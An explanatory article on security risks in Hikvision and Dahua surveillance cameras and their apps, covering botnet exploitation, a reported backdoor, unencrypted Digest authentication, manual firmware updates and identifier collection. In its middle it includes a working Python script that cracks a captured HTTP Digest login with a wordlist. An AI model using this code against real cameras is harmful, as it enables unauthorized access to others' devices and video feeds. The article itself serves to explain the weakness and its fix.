Hikvision and Dahua surveillance cameras could pose a security risk
Two of the biggest surveillance camera providers, Hikvision and Dahua, could pose a security risk.
Technology companies Zhejiang Dahua Technology Co., Ltd. and Hangzhou Hikvision Digital Technology Co., Ltd. are two of the biggest surveillance device providers in the world. Both were founded in 2001, and the two well-established Chinese companies now sell their surveillance cameras in more than 180 countries. Hikvision, which is partially owned by the Chinese government, accounts for about 22% of all surveillance cameras.
Both companies have made headlines numerous times over the years, for various reasons. Dahua devices have been exploited to build a botnet that carried out the largest DDoS (distributed denial-of-service) attack seen at the time, and Hikvision has been alleged to supply cameras for Xinjiang re-education camps. Nevertheless, their cameras are still widely used all over the world and are exhibited at various technology exhibitions and conferences. The cameras are used in a number of different fields, including industry, households, the service sector, traffic control, banking, education, construction, urban maintenance, and security.
However, the controversies involving Hikvision and Dahua have had some consequences. Citing human rights violations, the US has banned the use of Dahua and Hikvision video surveillance cameras by the US government, in US government-funded contracts, and for critical infrastructure and national security purposes. Both companies, along with a number of other organizations, have been placed on the Entity List, which is essentially a government blacklist.
There has also been growing concern that Hikvision and Dahua are slow to address known security problems in their products, potentially leaving customers exposed to being spied on. Furthermore, there are worries that the Chinese government is using private companies to extend its surveillance.
A number of issues related to Hikvision and Dahua surveillance cameras have been identified by various researchers.
Hikvision and Dahua camera vulnerabilities
In 2016, the largest DDoS attack seen up to that point was launched against a site run by investigative reporter and cybersecurity expert Brian Krebs. The distributed denial-of-service attack targeting krebsonsecurity.com was carried out by a botnet in which the majority of infected devices were Dahua and Dahua OEM products. Nearly a million Dahua devices were infected with the BASHLITE malware and added to the botnet. It was later revealed that a vulnerability in Dahua devices allowed anyone to take full control of them simply by supplying an overly long username to the login interface (a classic buffer overflow), and the botnet operators took advantage of this.
In another instance, a backdoor in many Dahua cameras was identified by a security researcher working for a Fortune 500 company. The company’s network operators discovered that the backdoor had been activated and that data was being sent through the company’s firewall to unknown IP addresses in China. Dahua issued a firmware update to fix the vulnerability, but researchers later found that the updated firmware still contained the same flaw, just in a different part of the code. Many security researchers believed this to be deliberate. A year later, Dahua cameras were banned from use by the US government.
Furthermore, surveillance devices from both companies have known software vulnerabilities that are publicly listed in the Common Vulnerabilities and Exposures (CVE) database. These vulnerabilities could allow an attacker to remotely intercept information, execute malicious code, and use the devices in DoS attacks. Before deploying a camera, it is worth checking the CVE database for the vendor and the exact firmware version in use.
User authentication is not encrypted
It has been noted that user authentication in both Hikvision and Dahua cameras takes place over an unencrypted HTTP connection using HTTP Digest access authentication. Digest does not transmit the password itself, only an MD5 hash of the username, realm and password combined with a server-supplied nonce; but because the exchange is not protected by TLS, an attacker on the network path can capture that hash while a user logs in and recover the password offline with a dictionary or brute-force attack. MD5 is cheap to compute, so the weak passwords common on cameras fall quickly, and anyone who can intercept the plaintext HTTP session can also read or modify everything else that passes over it. This could allow an attacker to intercept the video recording, enable or disable certain features, and/or disrupt regular operations.
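The following is an added illustration of the offline attack described above, written for this page; it is not code from Hikvision, Dahua or any researcher. It parses a captured Authorization: Digest header (the header values, the realm "IP Camera", the URI "/live/ch01" and the password "admin12345" are all constructed for the example, not taken from a real device), recomputes the RFC 2617 MD5 response for each candidate password, and stops when one matches. The capture is built inside the block from the assumed password so that the example runs offline.

```python
"""Offline dictionary attack against a captured HTTP Digest login.

Added example for this article; not vendor code. The camera, credentials
and header below are constructed/assumed values for illustration only.
"""
import hashlib


def md5_hex(text: str) -> str:
    """MD5 hex digest of a string (Digest auth's default algorithm)."""
    return hashlib.md5(text.encode()).hexdigest()


def digest_response(username, realm, password, method, uri, nonce, nc, cnonce, qop="auth"):
    """RFC 2617 Digest response for algorithm=MD5 and qop=auth.

    HA1 = MD5(username:realm:password)
    HA2 = MD5(method:uri)
    response = MD5(HA1:nonce:nc:cnonce:qop:HA2)
    """
    ha1 = md5_hex(f"{username}:{realm}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


def parse_authorization(header: str) -> dict:
    """Split an 'Authorization: Digest ...' header into its key/value fields."""
    if not header.startswith("Digest "):
        raise ValueError("not a Digest authorization header")
    fields = {}
    for part in header[len("Digest "):].split(","):
        key, _, value = part.strip().partition("=")
        fields[key] = value.strip('"')
    return fields


def crack_digest(header: str, method: str, wordlist):
    """Return the first candidate password that reproduces the captured response."""
    f = parse_authorization(header)
    for candidate in wordlist:
        guess = digest_response(f["username"], f["realm"], candidate, method,
                                f["uri"], f["nonce"], f["nc"], f["cnonce"], f["qop"])
        if guess == f["response"]:
            return candidate
    return None


# --- Constructed capture: what a sniffer on the plaintext HTTP link sees ---
# Assumed camera password for this scenario (never present in the capture).
_ASSUMED_PASSWORD = "admin12345"
_NONCE = "dcd98b7102dd2f0e8b11d0f600bfb0c093"   # assumed server nonce
_CNONCE = "0a4f113b"                            # assumed client nonce
CAPTURED_METHOD = "GET"
CAPTURED_RESPONSE = digest_response("admin", "IP Camera", _ASSUMED_PASSWORD,
                                    CAPTURED_METHOD, "/live/ch01", _NONCE, "00000001", _CNONCE)
CAPTURED_HEADER = (
    'Digest username="admin", realm="IP Camera", '
    f'nonce="{_NONCE}", uri="/live/ch01", qop=auth, nc=00000001, '
    f'cnonce="{_CNONCE}", response="{CAPTURED_RESPONSE}"'
)

# Small constructed wordlist; a real attack would use millions of entries.
WORDLIST = ["123456", "password", "admin", "12345", "admin12345", "hikvision"]


if __name__ == "__main__":
    found = crack_digest(CAPTURED_HEADER, CAPTURED_METHOD, WORDLIST)
    print("recovered password:", found)
```

The only thing protecting the password here is its guessability: the nonce stops a naive replay of the header, but it does nothing against offline guessing once the exchange has been captured. Running the login over HTTPS (or at least on a network segment the attacker cannot sniff) is what removes the exposure.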
Hikvision firmware updates have to be installed manually
Hikvision’s firmware is not updated automatically; users have to download and install updates manually. Furthermore, according to certain reports, the page providing updates is hosted on a server registered in China but redirects to a server registered in Russia, from which the update file is downloaded. It has also been noted that user update requests may be logged on these servers, which would reveal the requester’s IP address, country, time of request, and the firmware version requested.
An automatic update feature is highly important for keeping users secure. Forcing users to update the firmware manually, and making the download and install process complicated, discourages users from updating and leaves serious vulnerabilities unpatched.
Potential issues with Hikvision and Dahua mobile apps
Hikvision provides a mobile app, “Hik-Connect”, for managing and configuring the surveillance cameras, checking the feed, and capturing images and videos. It is available for devices running both Android and iOS, and can be downloaded from the Google Play Store and the Apple App Store respectively. The app requests permission to access the camera (for scanning QR codes), the microphone (for audio transmission), storage (for saving images and videos), phone state (for determining mobile Internet connection strength), and location.
While the app itself does not appear to have known vulnerabilities, it has been noted that it connects to 9 IP addresses in Ireland, China, Singapore and Thailand. The app also collects, for unknown purposes, device information such as the SIM card’s IMSI and ICCID identification numbers, as well as the device’s IMEI identification number. These are persistent hardware and subscriber identifiers, so they uniquely identify the handset and its owner to whoever receives them.
Dahua offers a mobile app, “gDMSS Plus”, for managing the surveillance cameras. The app requests permission to access the camera, microphone, location and storage. Again, the app does not appear to have known vulnerabilities. It connects to 26 IP addresses in the US, Germany, and China.